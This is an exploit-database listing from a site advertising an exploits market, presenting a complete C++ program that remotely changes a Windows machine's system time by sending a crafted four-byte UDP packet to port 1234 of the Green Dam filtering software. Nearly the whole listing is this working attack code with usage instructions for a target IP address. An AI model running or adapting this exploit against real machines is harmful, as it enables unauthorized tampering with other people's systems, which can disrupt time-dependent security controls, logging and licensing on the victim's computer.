[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Green Dam Remote Change System Time Exploit

Author
Anti GD
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9481
Category
remote exploits
Date add
30-06-2009
Platform
windows
===========================================
Green Dam Remote Change System Time Exploit
===========================================


// Green Dam listen on udp port 1234 and wait for the 4 bytes time value
// We can send some bytes to change the time of the dest system


#include <iostream>
#include <boost/asio.hpp>
#include <boost/date_time.hpp>

int main(int argc, char* argv[])
{
    try
    {
        if (argc != 3)
        {
            std::cerr << "Usage: testgd <host> <time_string>" << std::endl;
            std::cerr << "Example: testgd 192.168.0.12 \"2009-06-03 16:00:00.000\"" << std::endl;
            std::cerr << "Timezone is not calculated, please do it by yourself." << std::endl;
            std::cerr << "testgreendam[at]gmail.com" << std::endl;
            return -1;
        }

        using boost::asio::ip::udp;
        boost::asio::io_service io_service;
        udp::socket s(io_service, udp::endpoint(udp::v4(), 0));
        udp::endpoint dest(
                boost::asio::ip::address::from_string(argv[1]), 1234);

        boost::posix_time::ptime start(boost::gregorian::date(1900,1,1));
        // (2008-1-1) -- (2010-12-31)
        boost::posix_time::ptime end(boost::posix_time::time_from_string(argv[2]));
        boost::posix_time::time_duration sec_count = end - start;

        unsigned int i = htonl(sec_count.total_seconds());
        s.send_to(boost::asio::buffer((char*)&i, 4), dest);
    }
    catch (std::exception& e)
    {
        std::cerr << "Exception: " << e.what() << std::endl;
        return -1;
    }

    return 0;
}



#  0day.today [2024-12-25]  #